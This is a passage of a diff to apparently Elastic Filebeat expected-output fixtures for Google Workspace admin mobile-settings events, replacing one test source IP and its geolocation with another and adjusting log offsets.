- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "deletion"
@@ -302,26 +282,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2376,
+ "log.offset": 2371,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -342,7 +318,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -355,26 +331,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2796,
+ "log.offset": 2790,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -395,7 +367,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -408,26 +380,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3223,
+ "log.offset": 3216,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -448,7 +416,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -466,26 +434,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3646,
+ "log.offset": 3638,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -506,7 +470,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -519,26 +483,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 4354,
+ "log.offset": 4345,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -559,7 +519,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -574,26 +534,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 4795,
+ "log.offset": 4785,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -615,7 +571,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -633,26 +589,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 5341,
+ "log.offset": 5330,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -673,7 +625,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -688,26 +640,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 5993,
+ "log.offset": 5981,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -728,7 +676,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change",
@@ -743,27 +691,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 6534,
+ "log.offset": 6521,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -787,7 +731,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change",
@@ -802,27 +746,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 6993,
+ "log.offset": 6979,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -846,7 +786,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "deletion",
@@ -861,27 +801,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 7450,
+ "log.offset": 7435,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
